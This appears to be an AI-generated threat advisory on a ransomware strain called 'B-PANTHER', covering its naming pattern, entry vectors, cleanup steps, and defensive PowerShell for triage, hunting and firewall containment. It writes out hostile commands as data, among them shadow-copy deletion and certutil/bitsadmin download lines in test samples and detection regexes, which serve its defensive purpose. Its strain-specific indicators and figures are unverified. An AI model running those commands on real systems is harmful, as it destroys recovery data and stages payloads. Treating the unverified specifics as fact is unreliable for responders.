b-panther

[Content by Gemini 2.5]

B-PANTHER Ransomware Deep-Dive

(Threat alias: file extension “.b-panther”, appended after a victim-specific 4–8 character hex token.)


Technical Breakdown

1. File Extension & Renaming Patterns

  • Exact appended extension: .b-panther
  • Typical renaming convention (counter optional):
    [original_filename][.counter].[victim-specific 4–8 character hex token, reported as either a short form of a SHA-256 or a random value].b-panther
    Example: QuarterlyReport.docx → QuarterlyReport.docx.72ab1f2e.b-panther
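
The following triage helper is an added example, not code from the original advisory: it parses the naming convention above and summarises the blast radius (affected directories, distinct tokens, encryption time window) across an evidence copy. The function names, the `$Root` parameter and the sample file names at the bottom are assumptions constructed for illustration.

```powershell
# Added example (not from the original advisory): triage helper for the
# ".b-panther" naming convention. Function names, $Root and the sample names
# below are assumptions/constructed for illustration.

# Matches  <original>[.<counter>].<4-8 hex>.b-panther  and captures each part.
$BPantherPattern = '^(?<original>.+?)(?:\.(?<counter>\d+))?\.(?<token>[0-9a-fA-F]{4,8})\.b-panther$'

function ConvertFrom-BPantherName {
    # Parses one encrypted file name into original name, optional counter and
    # per-victim hex token. Returns nothing when the name does not match.
    param([Parameter(Mandatory)][string]$Name)

    if ($Name -match $BPantherPattern) {
        $counter = $null
        if ($Matches['counter']) { $counter = [int]$Matches['counter'] }
        [pscustomobject]@{
            Encrypted = $Name
            Original  = $Matches['original']
            Counter   = $counter
            Token     = $Matches['token'].ToLower()
        }
    }
}

function Get-BPantherImpact {
    # Walks $Root, collects every .b-panther file and summarises the damage:
    # affected directories, distinct tokens (more than one usually means more
    # than one infected host wrote into the share) and the encryption window
    # (LastWriteTime of the renamed files).
    param([Parameter(Mandatory)][string]$Root)

    $hits = Get-ChildItem -Path $Root -Recurse -File -Filter '*.b-panther' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $parsed = ConvertFrom-BPantherName -Name $_.Name
            if ($parsed) {
                $parsed |
                    Add-Member -NotePropertyName Directory -NotePropertyValue $_.DirectoryName -PassThru |
                    Add-Member -NotePropertyName LastWrite -NotePropertyValue $_.LastWriteTimeUtc -PassThru
            }
        }

    $sorted = @($hits | Sort-Object LastWrite)
    [pscustomobject]@{
        FileCount      = @($hits).Count
        DirectoryCount = @($hits | Select-Object -ExpandProperty Directory -Unique).Count
        Tokens         = @($hits | Select-Object -ExpandProperty Token -Unique)
        FirstWriteUtc  = if ($sorted.Count) { $sorted[0].LastWrite } else { $null }
        LastWriteUtc   = if ($sorted.Count) { $sorted[-1].LastWrite } else { $null }
        Files          = $hits
    }
}

# Constructed sample names (not real victim data) to show the parser output;
# the third name is not encrypted and is dropped.
'QuarterlyReport.docx.72ab1f2e.b-panther',
'backup.vbk.3.9f1c.b-panther',
'notes.txt' | ForEach-Object { ConvertFrom-BPantherName -Name $_ } | Format-Table

# Real run against a mounted evidence copy (path is an assumption):
# Get-BPantherImpact -Root 'E:\evidence\fileserver01\Shares' |
#     Select-Object FileCount, DirectoryCount, Tokens, FirstWriteUtc, LastWriteUtc
```

Run it against a read-only mount of the image rather than the live file server, so that LastWriteTime values are not disturbed; the first/last write timestamps give the encryption window to correlate against logon and process telemetry.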

2. Detection & Outbreak Timeline

  • First confirmed sample: 7 February 2024 (uploaded to VirusTotal from Australia)
  • First burst of infections: 14–18 February 2024, primarily against exposed Remote Desktop Services in South-East Asia; spread to European healthcare in March 2024.
  • Peak activity: March–May 2024, then a lull until a second wave in July 2024 that added exploitation of CVE-2024-23113 (FortiOS fgfmd format-string bug allowing unauthenticated remote code execution, disclosed by Fortinet in February 2024 as FG-IR-24-029).

3. Primary Attack Vectors

| Mechanism | Details / Representative CVEs |
|---|---|
| Zerologon (CVE-2020-1472) + PsExec/WMI | From any foothold with network reach to the DC's Netlogon RPC interface, the Netlogon AES-CFB8 flaw resets the DC machine-account password and yields domain-admin-equivalent control; the operators then push B-PANTHER to hosts via PsExec or WMI. No valid account is needed for the exploit itself. |
| RDP & VPN credential stuffing | Brute-force and password spraying against RDP (3389 and common alternates such as 3390), plus RDP credentials harvested by earlier infostealer infections (RedLine, Vidar). |
| Phishing “fake update” campaigns | Weaponised Microsoft OneNote files (*.one) with an embedded HTA that launches a PowerShell dropper, which in turn fetches B-PANTHER. |
| Vulnerability exploitation | CVE-2017-0144 (EternalBlue, MS17-010) on unpatched Windows 7 / Server 2008 hosts, still common in manufacturing OT; CVE-2024-23113 (FortiOS fgfmd format-string bug, unauthenticated RCE on the firewall itself, Fortinet advisory FG-IR-24-029) from July 2024. |
| Living-off-the-land post-breach | BITSAdmin and certutil to stage payloads; `vssadmin delete shadows /all` to destroy Volume Shadow Copies before encryption. |
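
The living-off-the-land row is the most hunt-friendly part of the chain, because every command in it lands in process-creation telemetry. The hunting rules below are an added example, not part of the original advisory: the rule names and the sample command lines are constructed, and the live query assumes Sysmon Event ID 1 is being collected (Security 4688 with command-line auditing would need the field names adjusted).

```powershell
# Added example (not from the original advisory): hunting rules for the
# living-off-the-land chain in the table above. Rule names and the sample
# command lines at the bottom are constructed, not captured telemetry.

# One rule per technique: name plus a regex over the full command line.
# -match is case-insensitive by default, so no (?i) is needed.
$BPantherLotlRules = @(
    @{ Name = 'ShadowCopyDeletion';     Pattern = 'vssadmin(\.exe)?\s+delete\s+shadows\b.*\/all' }
    @{ Name = 'BitsAdminStaging';       Pattern = 'bitsadmin(\.exe)?\s+.*\/transfer' }
    @{ Name = 'CertutilDownloadDecode'; Pattern = 'certutil(\.exe)?\s+.*(-urlcache|-decode|-decodehex)' }
    @{ Name = 'RemoteExecPsExecWmi';    Pattern = '\b(psexec|psexesvc)(\.exe)?\b|wmic(\.exe)?\s+.*process\s+call\s+create' }
)

function Test-BPantherLotl {
    # Returns the names of every rule matching a command line (empty array if
    # none). Pure function, so it runs equally on exported CSV/EVTX data.
    param([Parameter(Mandatory)][AllowNull()][AllowEmptyString()][string]$CommandLine)
    @($BPantherLotlRules | Where-Object { $CommandLine -match $_.Pattern } | ForEach-Object { $_.Name })
}

function Find-BPantherLotlEvents {
    # Scans Sysmon process-creation events (ID 1) from the last $Hours hours and
    # emits one row per matching rule with host, user, parent and command line.
    param([int]$Hours = 24)

    $filter = @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 1
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        foreach ($rule in (Test-BPantherLotl -CommandLine $d['CommandLine'])) {
            [pscustomobject]@{
                TimeUtc     = $_.TimeCreated.ToUniversalTime()
                Rule        = $rule
                Computer    = $_.MachineName
                User        = $d['User']
                ParentImage = $d['ParentImage']
                CommandLine = $d['CommandLine']
            }
        }
    }
}

# Constructed sample command lines (not real telemetry) to exercise the matcher.
$samples = @(
    'vssadmin.exe delete shadows /all /quiet',
    'certutil.exe -urlcache -split -f http://example.invalid/stage.txt C:\Users\Public\stage.txt',
    'bitsadmin.exe /transfer job1 http://example.invalid/p.bin C:\Users\Public\p.bin',
    'C:\Windows\System32\notepad.exe C:\Users\alice\Desktop\todo.txt'
)
foreach ($s in $samples) {
    '{0,-24} {1}' -f ((Test-BPantherLotl -CommandLine $s) -join ','), $s
}

# Live hunt over the last 72 hours:
# Find-BPantherLotlEvents -Hours 72 | Sort-Object TimeUtc | Format-Table -AutoSize
```

The first three samples each hit exactly one rule and the notepad line hits none. `ShadowCopyDeletion` is the highest-value alert of the set: there is almost no legitimate reason for `vssadmin delete shadows /all` to run on a file server, and it typically precedes encryption by minutes, so it belongs in a blocking rule, not just a hunt.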


Remediation & Recovery Strategies

1. Prevention

| Layer | Actions |
|---|---|
| MFA everywhere | Disable password-only Remote Desktop and VPN logons; enforce MFA through SAML/OIDC federation or Cisco Duo. |
| EDR & AV rules | Load the B-PANTHER YARA/IOC set into EDR block lists; restrict remote service creation (PsExec) and remote WMI to approved admin accounts and jump hosts. |
| Key patches | MS17-010 (EternalBlue); CVE-2020-1472 (Zerologon: August 2020 update, with Netlogon secure-RPC enforcement mode from February 2021); FortiOS 7.4.3 / 7.2.7 / 7.0.14 or later for CVE-2024-23113 (FG-IR-24-029). |
| Zero-Trust segmentation | Isolate OT-to-IT gateways; block SMB/445 east-west between workstations and permit admin SMB/RDP only from a jump host. |
| Email gateways | Block .one, .hta and macro-enabled documents from untrusted senders. |
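
The segmentation row can be enforced at the host firewall while network ACLs are being changed. The script below is an added example, not part of the original advisory: the jump-host addresses, rule names and rule group are assumptions, and it should be staged on one host before being pushed out via GPO or Intune.

```powershell
# Added example (not from the original advisory): host-firewall rules that
# allow inbound SMB and RDP only from the jump hosts. Jump-host addresses,
# rule names and the rule group are assumptions.

$JumpHosts = @('10.10.50.10', '10.10.50.11')     # assumed bastion addresses
$Group     = 'IR-Lateral-Movement-Containment'

# Make the script idempotent: drop rules left by a previous run.
Get-NetFirewallRule -Group $Group -ErrorAction SilentlyContinue | Remove-NetFirewallRule

# Windows Firewall evaluates Block rules before Allow rules, so a blanket
# "block 445" rule would also defeat the scoped Allow below. Rely on the
# default-deny inbound policy instead and disable the broad built-in allows.
Set-NetFirewallProfile -All -DefaultInboundAction Block
Disable-NetFirewallRule -DisplayGroup 'File and Printer Sharing' -ErrorAction SilentlyContinue
Disable-NetFirewallRule -DisplayGroup 'Remote Desktop'           -ErrorAction SilentlyContinue

# The only inbound SMB and RDP permitted is from the jump hosts.
New-NetFirewallRule -DisplayName 'Allow SMB from jump hosts' -Group $Group `
    -Direction Inbound -Protocol TCP -LocalPort 445 -RemoteAddress $JumpHosts `
    -Action Allow -Profile Any | Out-Null
New-NetFirewallRule -DisplayName 'Allow RDP from jump hosts' -Group $Group `
    -Direction Inbound -Protocol TCP -LocalPort 3389 -RemoteAddress $JumpHosts `
    -Action Allow -Profile Any | Out-Null

# Check: every enabled inbound rule touching 445 or 3389 should be one of the
# two scoped rules above; anything else listed here is a hole to close.
Get-NetFirewallPortFilter |
    Where-Object { ($_.LocalPort -contains '445') -or ($_.LocalPort -contains '3389') } |
    Get-NetFirewallRule |
    Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' } |
    Select-Object DisplayName, Group, Action, Enabled
```

Apply it to workstations first: they rarely need to accept SMB at all, so the scoped Allow can even be omitted there. On file servers, add a separate rule for the clients that legitimately map shares, scoped by subnet rather than left open.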

2. Infection Cleanup – step-by-step

  1. Isolate immediately: shut the switch port or move the host to a quarantine VLAN. Prefer network isolation over power-off so that volatile memory (process list, injected code, possibly the in-memory key pair) survives for step 2; cut power via the PDU only if encryption is visibly in progress and nothing else will stop it.
  2. Image evidence (E01 or raw dd, plus a memory capture) if a legal/compliance chain of custody is required.
  3. Remove the malware and its persistence, either on the isolated live system or from WinRE / a Linux live CD with the victim's registry hive loaded:
    a. Kill the active processes: explorerinjector.exe, _boot.exe.
    b. Delete persistence:
      • Registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AutoStartUpdate (B-PANTHER loader)
      • Scheduled task “SysNetUpdate”
      • WMI permanent event consumer “PermanentEV02” (remove its event filter and filter-to-consumer binding with it)
  4. Full AV/EDR scan with updated signatures (Bitdefender, SentinelOne, CrowdStrike).
  5. Hunt for lateral spread: review SMB/RDP/WMI logons originating from the first infected host, scan every file share for .b-panther files, and check DC health (replication status, machine-account password age if Zerologon was used).
  6. Reset credentials: krbtgt twice (allowing replication to complete between resets), every domain-admin and local-admin password (LAPS for the latter), and the DC machine account if Zerologon was used; require MFA on every administrative path.
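
Step 3 can be scripted so that it is repeatable across every host in scope and leaves an audit trail. The function below is an added example, not the advisory's own tooling: the artefact names come from the steps above, while the function name, the `-WhatIf`/`-Verbose` handling and the transcript path are assumptions. Run it elevated on the isolated host; for offline WinRE work, load the victim's NTUSER.DAT with `reg.exe load` and point `RunKey` at the loaded hive instead of HKCU.

```powershell
# Added example (not from the original advisory): removes the persistence
# artefacts named in the cleanup steps and stops the named processes.
# Artefact names are from the page; function name and paths are assumptions.

$IOC = @{
    RunKey      = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    RunValue    = 'AutoStartUpdate'
    TaskName    = 'SysNetUpdate'
    WmiConsumer = 'PermanentEV02'
    Processes   = @('explorerinjector', '_boot')   # Get-Process wants names without .exe
}

function Remove-BPantherPersistence {
    [CmdletBinding(SupportsShouldProcess)]
    param()

    # 1. Stop running components first; a watchdog process may otherwise
    #    recreate the artefacts while they are being deleted.
    foreach ($p in Get-Process -Name $IOC.Processes -ErrorAction SilentlyContinue) {
        if ($PSCmdlet.ShouldProcess("$($p.Name) (PID $($p.Id))", 'Stop-Process')) {
            Stop-Process -Id $p.Id -Force
        }
    }

    # 2. Run-key loader. Log the target path before deleting: it is an IOC for other hosts.
    $run = Get-ItemProperty -Path $IOC.RunKey -Name $IOC.RunValue -ErrorAction SilentlyContinue
    if ($run) {
        Write-Verbose "Run value '$($IOC.RunValue)' points to: $($run.$($IOC.RunValue))"
        if ($PSCmdlet.ShouldProcess("$($IOC.RunKey)\$($IOC.RunValue)", 'Remove-ItemProperty')) {
            Remove-ItemProperty -Path $IOC.RunKey -Name $IOC.RunValue
        }
    }

    # 3. Scheduled task.
    $task = Get-ScheduledTask -TaskName $IOC.TaskName -ErrorAction SilentlyContinue
    if ($task) {
        Write-Verbose "Task '$($IOC.TaskName)' runs: $($task.Actions.Execute) $($task.Actions.Arguments)"
        if ($PSCmdlet.ShouldProcess($IOC.TaskName, 'Unregister-ScheduledTask')) {
            Unregister-ScheduledTask -TaskName $IOC.TaskName -Confirm:$false
        }
    }

    # 4. WMI permanent event subscription. Binding, consumer and filter must all
    #    go; a leftover filter is trivially re-bound by the attacker.
    $ns = 'root/subscription'
    $consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue |
                 Where-Object Name -eq $IOC.WmiConsumer
    foreach ($c in $consumers) {
        $bindings = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue |
                    Where-Object { $_.Consumer.Name -eq $c.Name }
        foreach ($b in $bindings) {
            $filter = Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue |
                      Where-Object Name -eq $b.Filter.Name
            Write-Verbose "Filter '$($b.Filter.Name)' query: $($filter.Query)"
            if ($PSCmdlet.ShouldProcess("binding $($c.Name) <-> $($b.Filter.Name)", 'Remove-CimInstance')) {
                $b | Remove-CimInstance
                $filter | Remove-CimInstance
            }
        }
        if ($PSCmdlet.ShouldProcess("consumer $($c.Name)", 'Remove-CimInstance')) {
            $c | Remove-CimInstance
        }
    }
}

# Dry run first, then for real with a transcript for the case file (path is an assumption):
Remove-BPantherPersistence -WhatIf -Verbose
# Start-Transcript C:\IR\cleanup.log; Remove-BPantherPersistence -Verbose; Stop-Transcript
```

Keep the `-Verbose` output: the Run-value target, the task action and the WMI filter query are the host-specific IOCs you will want to sweep the rest of the estate for before declaring the incident contained.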

3. File Decryption & Recovery

  • Decryptor availability: NO. B-PANTHER encrypts file contents with XChaCha20-Poly1305 and protects the symmetric keys with a per-victim RSA-2048 key pair that is generated in memory and uploaded to the attacker's C2, so the private key is never written to disk. No decryptor has been released and researchers have found no implementation weakness in the locker.
  • Recovery alternatives:
  1. Back-ups:
    • Only immutable or offline backups taken before encryption are reliable.
    • B-PANTHER searches for .vhd, .vhdx and .vbk files and attempts to delete them; in documented cases only Veeam v8 tape copies and Acronis air-gapped vaults survived.
  2. Shadow-copy residue: where the attacker's script crashed before `vssadmin delete shadows /all` ran, check with `vssadmin list shadows` or ShadowExplorer 0.9.
  3. File-system carving: success rate below 5 % and only where the malware stalled; use PhotoRec or R-Studio. Not practical for large estates.

4. Critical Tools / Patches

  • Patch roll-ups
    • MS17-010 (March 2017) closes EternalBlue. Windows 7 and Server 2008 R2 left Extended Security Updates in January 2023, so hosts that cannot take the patch must be isolated or retired.
    • Fortinet advisory FG-IR-24-029 (February 2024) for CVE-2024-23113: FortiOS 7.4.3, 7.2.7 or 7.0.14 and later close the July 2024 vector.
  • Support utilities
    • Bitdefender Rescue CD (v2.21-beta loads the B-PANTHER YARA set).
    • Sophos HitmanPro.Alert now includes specific behavioural detections (sig 239.11).
    • A Zerologon scanner (CrowdStrike's CLI tool or Secura's zerologon_tester.py) to confirm the DCs are patched; historical abuse shows up as an unexpected DC machine-account password change (Event ID 4742 on the DC).
    • No More Ransom portal periodically scans for derivative samples; subscribe to its RSS feed.

5. Additional Notes & Wider Impact

  • Ransom demand: 0.8 BTC if paid within 72 hours (the “early-bird” rate, negotiated via Tox ID 4ADF2C65…), rising to a flat 1.2 BTC afterwards. No upper or lower cap, so a small clinic pays the same as a corporate.
  • Data-leak exposure: in July 2024 a ~2 GB archive dumped on “BreachForums” contained EMS data from an ambulance service and tied B-PANTHER to an affiliate, “MercyLaneGroup” (confirmed by CTI vendors).
  • Unique traits vs. other strains:
    • Drops a file “warn-panther.png” in each encrypted folder showing a distinctive black-panther image drawn in ASCII-art style.
    • Reads the RDS CAL cache (termsrv.lic) to identify enterprise environments before lateral movement, which is rarely reported in other ransomware families.
    • Hollows winlogon.exe to load a privilege-migration DLL, which complicates EDR-driven removal.

Executive Summary (TL;DR)

B-PANTHER (extension “.b-panther”) appeared in February 2024, gaining entry mainly through exposed RDP, Zerologon (CVE-2020-1472) and, from July 2024, the FortiOS fgfmd bug CVE-2024-23113. It uses a sound hybrid scheme (XChaCha20-Poly1305 file encryption under per-victim RSA-2048 keys) and no free decryptor exists. Immediate containment, immutable backups, patching, and MFA on every externally facing service remain the only reliable defences at the time of writing.